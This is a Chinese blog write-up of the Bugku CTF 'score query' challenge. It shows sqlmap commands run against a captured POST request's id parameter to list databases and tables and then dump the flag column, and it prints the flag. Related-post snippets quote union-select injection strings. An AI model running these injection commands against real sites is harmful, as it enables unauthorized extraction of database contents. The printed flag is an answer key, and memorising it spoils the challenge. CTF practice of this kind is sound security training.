Bugku CTF:成绩查询[WriteUP]

已于 2023-11-25 11:21:35 修改
阅读量331 收藏
点赞数 10
文章标签: 网络安全
于 2023-11-25 11:16:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43007452/article/details/134611795
版权

使用BurpSuite对post抓包

复制Raw内容进txt文件用于sql注入

这里我把包里的信息复制出来保存为post.txt

看抓到的包最下面是id,选择注入点为:id 开始进行注入

sqlmap -r 'post.txt' -p id --dbs //列出所有的数据库名称

 很明显应该就是‘skctf’

 

sqlmap -r 'post.txt' -p id -D skctf --tables 
// -D选择数据库
// --tables列出表单
// 爆破指定数据库下的表名

 等一会就出表了

继续执行

sqlmap -r 'post.txt' -p id -D skctf -T fl4g --columns
// -T选择表
// --tables缩写成 -T
// --columns列出‘fl4g’表中的所有列

直接展示skctf_flag中的值即可 

sqlmap -r 'post.txt' -p id -D skctf -T fl4g -C 'skctf_flag' --dump
// --columns缩写成 -C
// --dump获取表中的列里的字段数据

 flag{d3f51dfa9558ba7e3bfb0fef9695cba9}

0DayHP
关注
  • 10
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
ctf刷题笔记之sql注入-union注入|bugku CTF成绩查询
weixin_51614848的博客
08-18 1287
ctf刷题笔记
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
BUGkuCTF-成绩查询
dfhjlll的博客
12-21 647
输入1 出来界面,猜测应该是sql注入,看源码是post注入, 输入id=1’,没有出来成绩单,是单引号注入 加上注释符,然后使用union select 1,2,3,4一次次尝试,在输入5的时候没有成绩,猜测是5列,查出来库的名字后往下就是纯粹的sql注入了,查表,查列,就能查出来flag了 ...
Bugku---web---成绩查询
weixin_47450099的博客
06-03 531
sql注入相关知识,内有各种爆破语句
bugku 成绩查询
m0_73721944的博客
12-22 379
这意味着 -d "skctf" 这部分的语法有问题。但报错了(看别人的wp爆出的库是skctf_flag,不知道为什么,我查询语句时也是skctf)按照我查询到的库skctf,字段skctf_flag。一个数据库skctf(估计flag就在里面)skctf中只有两个表 fl4g,sc。大佬的wp确实有,也许是现在做了修改。我想用下面的语句爆skctf中的库。说明库确实是skctf_flag。所以skctf_flag是表?得到了两个表,fl4g和sc。爆出了三个库,五十三个表。发现了一个库skctf
bugku--成绩查询
hxhabcd123的博客
08-28 1472
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
BUGKU-成绩查询
m0_64180167的博客
12-03 919
打开环境 随便输入 发现URL 不传参 怀疑是POST型于是我们查看源代码发现是POST型打开终端因为是POST型 所以有两种方式语法:sqlmap -r "txt地址"kali中要下载数据包 我们在物理windows系统上的BP进行抓取 打包成文件然后把后缀改成.txt 通过共享文件传输到kali中,或者直接从桌面拖到kali桌面中打开sqlmap运行指令sqlmap -r "bugku.txt"于是我们开始爆破库sqlmap -r "bugku.txt" --tables 把库名和表名爆出来了然后我们发
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题。题目地址:https://ctf.bugku.com/challenges/detail/id/84.html?id=84&page=8 这道题可以有效的锻炼union注入和sqlmap的入门操作,...
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
Bugku学生成绩查询
qq_44813849的博客
03-19 2107
打开网站之后进入界面输入1,2,3分别能查到1,2,3号学生的成绩,其余便查询不到。猜测是sql注入
ctf-web-成绩查询
god_001的博客
04-13 1127
题目: 打开网页: 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时: 查看源代码: 发现,表单使用post方式提交,并且name="id" 猜测使用SQL注入 首先检测闭合方式: 分别post id=1' id=1" 发现post id=1"时,正常,post id=1'时无响应 应该是单引号 ' ' 闭合 再通过order by查询当前表列数: 于是可以判断...
CTF练习题[WEB]-成绩查询
weixin_45246254的博客
01-05 1827
https://ctf.bugku.com/challenges/detail/id/84.html?page=4 拿到题目如下 查询处考虑sql注入 查询一下 没有报错信息,直接把请求包丢到sqlmap里面 发现union注入 查看当前数据库 查看数据表 发现f14g表 直接dump 获得flag ...
Bugku Web CTF-学生成绩查询
No Title
12-16 1192
Bugku Web CTF-学生成绩查询 该题解题思路是SQL注入,测试思路如下:。 直接输入’单引号没有回显; 输入’#有回显; 通过union来猜解该表有多少列: 0' union select 1,2,3,4# 可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。 获取数据库名: 0' union select 1,user(),database()...
bugkuCTF学生成绩查询writeup----sqlmap注入
qq_41492160的博客
12-08 2171
1.题目 2.查看是否存在注入漏洞 测试:如果id=1后面加‘ 不正常 加-- l恢复正常,说明存在数字型漏洞            两个都不正常说明不存在数字型注入           如果  id=1后面接 and  0   页面没有内容 and  1  页面正常显示内容说明有数字型漏洞           如果都不正常说明没有数字型漏洞 3.存在漏洞找注入点 使用burpsui...
[WUSTCTF2020]颜值成绩查询
Yb_140的博客
11-03 139
sql盲注
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 766
[WUSTCTF2020]颜值成绩查询(布尔注入)
Bugku-成绩查询
qq_56611811的博客
05-17 421
进入题目差不多能够猜到是关于sql注入的题,1'没有返回结果,1'#能够成功查询,这说明注释符是有效果的。2.当num是5时无法回显内容,说明表可能有4列。
8-杂项题目练习(五)
10-05
本资源是一份针对IT安全和编码挑战的杂项题目练习集,共包含五个题目,旨在帮助学习者提升技能和理解各种技术问题。以下是每个题目的详细介绍: 1. 杂项第三十四题:图穷匕见 - 题目涉及解密隐藏在图像中的信息。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0DayHP

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值